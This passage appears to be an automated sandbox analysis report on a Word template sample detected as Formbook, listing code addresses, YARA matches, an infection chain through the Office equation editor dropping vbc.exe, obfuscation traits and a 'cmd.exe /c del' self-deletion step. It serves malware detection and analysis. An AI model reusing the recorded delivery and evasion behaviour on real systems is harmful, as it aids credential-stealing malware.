Source: C:\Users\Public\vbc.exe	Code function: 5_2_0097579A		5_2_0097579A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008FC7BC		5_2_008FC7BC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009257C3		5_2_009257C3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0098F8EE		5_2_0098F8EE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008FC85C		5_2_008FC85C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091286D		5_2_0091286D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0099098E		5_2_0099098E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F29B2		5_2_008F29B2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009069FE		5_2_009069FE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00975955		5_2_00975955
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009A3A83		5_2_009A3A83
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0099CBA4		5_2_0099CBA4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0097DBDA		5_2_0097DBDA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFBD7		5_2_008EFBD7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00917B00		5_2_00917B00
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0098FDDD		5_2_0098FDDD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00920D3B		5_2_00920D3B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008FCD5B		5_2_008FCD5B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00922E2F		5_2_00922E2F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090EE4C		5_2_0090EE4C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00900F3F		5_2_00900F3F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091DF7C		5_2_0091DF7C
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00401030		5_1_00401030
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00401174		5_1_00401174
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041CABA		5_1_0041CABA
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00408C5B		5_1_00408C5B
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00408C60		5_1_00408C60
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041C4CF		5_1_0041C4CF
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041BD5B		5_1_0041BD5B
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041B502		5_1_0041B502
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00402D87		5_1_00402D87
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00402D90		5_1_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00402FB0		5_1_00402FB0
Source: C:\Windows\explorer.exe	Code function: 6_2_029512FF		6_2_029512FF
Source: C:\Windows\explorer.exe	Code function: 6_2_0294E8F9		6_2_0294E8F9
Source: C:\Windows\explorer.exe	Code function: 6_2_02953062		6_2_02953062
Source: C:\Windows\explorer.exe	Code function: 6_2_029555B2		6_2_029555B2
Source: C:\Windows\explorer.exe	Code function: 6_2_029547C7		6_2_029547C7
Source: C:\Windows\explorer.exe	Code function: 6_2_0294E902		6_2_0294E902
Source: C:\Windows\explorer.exe	Code function: 6_2_02951302		6_2_02951302
Source: C:\Windows\explorer.exe	Code function: 6_2_0294F362		6_2_0294F362
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_023F1238		7_2_023F1238
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0234E2E9		7_2_0234E2E9
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_02352305		7_2_02352305
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0239A37B		7_2_0239A37B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_02357353		7_2_02357353
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_023F63BF		7_2_023F63BF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_023763DB		7_2_023763DB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0234F3CF		7_2_0234F3CF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0237D005		7_2_0237D005
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0236905A		7_2_0236905A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_02353040		7_2_02353040
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0234E0C6		7_2_0234E0C6
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0239A634		7_2_0239A634
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_023F2622		7_2_023F2622
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_02354680		7_2_02354680
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0235E6C1		7_2_0235E6C1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0235C7BC		7_2_0235C7BC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_023D579A		7_2_023D579A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_023857C3		7_2_023857C3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0238D47D		7_2_0238D47D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_02385485		7_2_02385485
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_02361489		7_2_02361489
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0235351F		7_2_0235351F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_02396540		7_2_02396540
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0236C5F0		7_2_0236C5F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_02403A83		7_2_02403A83
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_02377B00		7_2_02377B00
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_023FCBA4		7_2_023FCBA4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0234FBD7		7_2_0234FBD7
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_023DDBDA		7_2_023DDBDA
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0237286D		7_2_0237286D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0235C85C		7_2_0235C85C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_023EF8EE		7_2_023EF8EE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_023D5955		7_2_023D5955
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_023529B2		7_2_023529B2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_023F098E		7_2_023F098E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_023669FE		7_2_023669FE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_02382E2F		7_2_02382E2F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0236EE4C		7_2_0236EE4C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_02360F3F		7_2_02360F3F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0237DF7C		7_2_0237DF7C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_02380D3B		7_2_02380D3B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0235CD5B		7_2_0235CD5B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_023EFDDD		7_2_023EFDDD
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0009C4CF		7_2_0009C4CF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0009B502		7_2_0009B502
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0009CABA		7_2_0009CABA
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00088C5B		7_2_00088C5B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00088C60		7_2_00088C60
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0009BD2F		7_2_0009BD2F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00082D87		7_2_00082D87
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00082D90		7_2_00082D90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00082FB0		7_2_00082FB0

Found potential string decryption / allocating functions

Source: C:\Users\Public\vbc.exe	Code function: String function: 00419F70 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0095F970 appears 81 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0093373B appears 238 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0041A0A0 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 008EE2A8 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00933F92 appears 108 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 008EDF5C appears 118 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 0234DF5C appears 118 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 023BF970 appears 81 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 02393F92 appears 108 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 0239373B appears 238 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 0234E2A8 appears 38 times

Yara signature match

Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: vbc[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Binary contains paths to development resources

Source: explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Classification label

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOT@10/8@8/5

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$dot.dot

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC5FD.tmp

Jump to behavior

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Source: dot.dot	Virustotal: Detection: 43%
Source: dot.dot	ReversingLabs: Detection: 33%

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6705C562-0AE7-40EA-8474-F39DAB1813D0}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
Source:	Binary string: napstat.pdb source: vbc.exe, 00000005.00000003.2117075823.000000000050C000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\vbc.exe

Unpacked PE file: 5.2.vbc.exe.400000.0.unpack .text:ER;.data:W;.fipuh:W;.wuta:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;

PE file contains sections with non-standard names

Source: vbc[1].exe.2.dr	Static PE information: section name: .fipuh
Source: vbc[1].exe.2.dr	Static PE information: section name: .wuta
Source: vbc[1].exe.2.dr	Static PE information: section name: .new
Source: vbc.exe.2.dr	Static PE information: section name: .fipuh
Source: vbc.exe.2.dr	Static PE information: section name: .wuta
Source: vbc.exe.2.dr	Static PE information: section name: .new

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002370D6 pushfd ; iretd		4_2_002370D9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0023D921 pushfd ; ret		4_2_0023D928
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0023C955 push eax; ret		4_2_0023C9A8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0023C9A2 push eax; ret		4_2_0023C9A8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0023C9AB push eax; ret		4_2_0023CA12
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0023CA0C push eax; ret		4_2_0023CA12
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0022D32A push 00000064h; retf		4_2_0022D32C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0023743D push esi; iretd		4_2_00237446
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002364CB push 0000000Dh; retf		4_2_002364CE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00237516 pushfd ; iretd		4_2_0023752F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03ECE2D7 push ebx; iretd		4_2_03ECE4A7
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03ECE4AD push ebx; iretd		4_2_03ECE4A7
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03ECE46F push ebx; iretd		4_2_03ECE4A7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00415B36 pushfd ; iretd		5_2_00415B39
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C381 pushfd ; ret		5_2_0041C388
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B3B5 push eax; ret		5_2_0041B408
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B46C push eax; ret		5_2_0041B472
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B402 push eax; ret		5_2_0041B408
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B40B push eax; ret		5_2_0041B472
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0040BD8A push 00000064h; retf		5_2_0040BD8C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00415E9D push esi; iretd		5_2_00415EA6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00415F76 pushfd ; iretd		5_2_00415F8F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00414F2B push 0000000Dh; retf		5_2_00414F2E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EDFA1 push ecx; ret		5_2_008EDFB4
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00415B36 pushfd ; iretd		5_1_00415B39
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041C381 pushfd ; ret		5_1_0041C388
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041B3B5 push eax; ret		5_1_0041B408
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041B46C push eax; ret		5_1_0041B472
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041B402 push eax; ret		5_1_0041B408
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041B40B push eax; ret		5_1_0041B472
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0040BD8A push 00000064h; retf		5_1_0040BD8C

Binary may include packed or encrypted code

Source: initial sample	Static PE information: section name: .text entropy: 7.49490680745
Source: initial sample	Static PE information: section name: .text entropy: 7.49490680745

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
